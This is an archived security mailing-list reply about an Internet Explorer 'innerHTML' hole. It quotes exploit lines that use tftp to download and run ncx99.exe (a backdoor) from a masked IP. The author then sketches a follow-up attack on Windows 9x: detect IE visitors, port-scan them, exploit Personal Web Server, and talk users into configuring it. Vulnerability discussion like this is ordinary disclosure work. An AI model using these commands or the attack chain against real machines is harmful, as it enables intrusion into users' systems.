RE: Rather large MSIE-hole

["Wall, Kevin" <Kevin.Wall () qwest com>]

Felipe Franciosi wrote...

> > var programName=new Array(
> >      'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
> >      'c:/winnt/system32/ncx99.exe',
> >  );
>
> MS Windows 9x don't have trivial ftp client by default... I was
> thinking how this could be exploitable on these versions...
>
> The FTP client offers the option to read a text-file containing
> line separated commands.
>
> But I couldn't get to work something like:
> var prog...
>       'c:/command.com /c echo bin > c:/list.txt',
>       'c:/command.com /c echo GET something >> c:/list.txt'
>
> this won't create 'list.txt'... Any ideas why? Or how some could
> get around it?

On Win9x systems, rather than targeting FTP or a command shell,
what about starting up something that simply causes a exploitable
process to listen on some port # (will vary, depending on
application) and then separately trying to exploit that. One
could monitor one's web server access logs to notice when someone downloaded
the first half of the exploit (the innerhtml hole). 
(Alternately, write a servlet/JSP/CGI script and you don't
even need to monitor the log file.)

If the User-Agent corresponds to MSIE, then at some time late
(perhaps wait t minutes later), gently port scan the remote
IP address to see if the application was launched. If the port
scan succeeds, then go into full exploit mode. (This assumes an
exploitable application that is normally not running and no
pesky personal firewalls, etc. to be sure. But certainly some
combinations would be vulnerable given the cluelessness of the
typical Windoze users and their disdain for ever updating their
system with security patches.) A bigger assumption is choosing
an exploitable application that (preferably) launches without
user intervention or requires any command line arguments. I
don't know that much about Windoze apps, so all I have is one
candidate application [see below.] (I do all my development
for Solaris; I just have to use WinNT & LookOut! from work--sigh).

However, the "Personal Web Server" that comes with Win98 (and
perhaps other Windoze systems?) comes to mind as a possibility.
The Personal Web Server is so full of holes that the executable
name is probably 'swisscheese.exe'. I seem to recall doing a
Win9x re-install for a friend where I think I was prompted as
to whether I wanted to RUN it, but I don't remember it prompting
if I wanted to load it. IIRC, that might mean that it was
installed, but just not started, by default. (Or perhaps it's
part of a commonly choosen package.) I never ran PWS, so I don't
know if the Personal Web Server needs to be configured first to
run or what. (If so, perhaps a bit of social engineering is in
order. Tell people that a certain wizard dialog box is going to
pop-up and and give them instructions how to configure it,
making up some excuse as to why they should do this. Surely
someone would fall for it.) The "good" thing about the
Personal Web Server is that I believe that Microsoft's attitude
with it with respect to security vulnerabilities has been pretty
much to ignore them and to tell people to run IIS instead (since
IIS is so much more secure ;-).

Anyway, just my $.02 worth. BTW, just so you know, these are
my personal opinions and in no way reflect the views of my
company.
---
Kevin W. Wall   Qwest IT, Inc. / Security Infrastructure Dev Team
Kevin.Wall () qwest com Phone: 614.932.5542
"Wipe Info uses hexadecimal values to wipe files. This provides more
security than wiping with decimal values."
                -- Norton System Works 2002 manual, pg 160